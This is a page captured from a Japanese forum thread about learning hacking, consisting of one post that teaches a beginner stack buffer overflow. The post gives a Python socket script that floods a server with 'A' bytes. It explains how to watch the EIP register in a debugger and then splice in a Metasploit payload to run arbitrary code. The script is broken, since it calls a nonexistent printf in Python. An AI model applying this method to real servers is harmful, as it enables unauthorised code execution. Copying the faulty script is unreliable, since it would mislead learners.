[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 2ch.scのread.cgiへ]
Update time : 11/06 14:01 / Filesize : 187 KB / Number-of Response : 740
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

ハッキングを学びたい part3



383 名前:すーぱーはかー mailto:sage [2016/01/21(木) 14:19:11.29 ID:???.net]
>>349とかどう見ても自分に酔ってるだけのアホだろ
何で真面目に答えてる奴が居るんだよwwwwww
簡単なレベルなら教えてやんよ
まずソケットプログラム作れ、今回はpythonで書く

#!/usr/bin/python
#
import socket

exploit = b"A" * 1000
payload = b"\x00\x00"
sploit = exploit + payload

printf(sploit)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 10000)) #IP,ポート
s.send(sploit)
s.close()

ま、これが簡単なソケットプログラムな
windowsでollydbgやimmunity debuggerで脆弱性のある鯖を起動する
上のソケットプログラムのIPとポートを変えてAを1000個などの大量のパケットを送信する
ollydbgやimmunity debuggerの方にあるregistersのEIPって所を見ると41414141とかになったりすることがある
EIPの41414141は翻訳すると"AAAA"ってことなんだよ、もちろん"A"の部分を"B"にすればEIPは42424242ってなって翻訳すると"BBBB"ってことになる
つまりregistersのEIPに送信したパケットが入ればいい、これがよく言われるバッファオーバーフローって現象
あとはmetasploitとかを使ってpayloadを作成して"\x00\x00"って所に貼り付けて"A"の個数をEIPまで調節すれば任意のコードが動く
自動化するツールもあるけれど殆どのハッカーはこういう感じで脆弱性を探してるんだよ






[ 続きを読む ] / [ 携帯版 ]

全部読む 前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<187KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef